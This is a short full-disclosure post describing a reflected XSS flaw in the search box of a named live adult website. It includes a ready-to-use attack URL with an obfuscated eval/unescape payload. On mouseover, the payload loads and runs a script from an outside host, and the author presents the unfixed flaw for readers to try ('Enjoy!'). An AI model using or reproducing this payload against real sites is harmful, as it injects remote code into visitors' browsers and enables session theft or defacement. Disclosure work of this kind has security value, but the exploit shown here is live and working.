Hello, Yesterday I discovered a funny XSS injection in the website http://chicasdetorbe.com which is an affiliate site of the popular website http://www.putalocura.com/ Despite my efforts at contacting with the site owner I received silence as answer, I suppose because he though this was either not serious or he just wanted to ignore me. Thus after the having sent various warnings of Full Disclosure I have decided to publish the whole thing. The vulnerability: The vulnerability is quite simple, the contents of the search string are pasted escaping characters like ' " and \ inside the value field of the input thus you can insert which ever attributes you want which allows for event based injection as long as you don't use the characters ' " or \ since they will be escaped with an extra \. Take into account that even if they tried to detect dangerous strings this would be bypasable by adding <> since those are removed by the content manager. The demo (the site is NSFW so be careful): 1. Go to: http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F (You may need to copy and paste the whole link). 2.Put the mouse over the search bar on the top left. 3. Enjoy! (The text is in Spanish and basically offer links to free porn and photos of chonis: a social group in Spain). klondike
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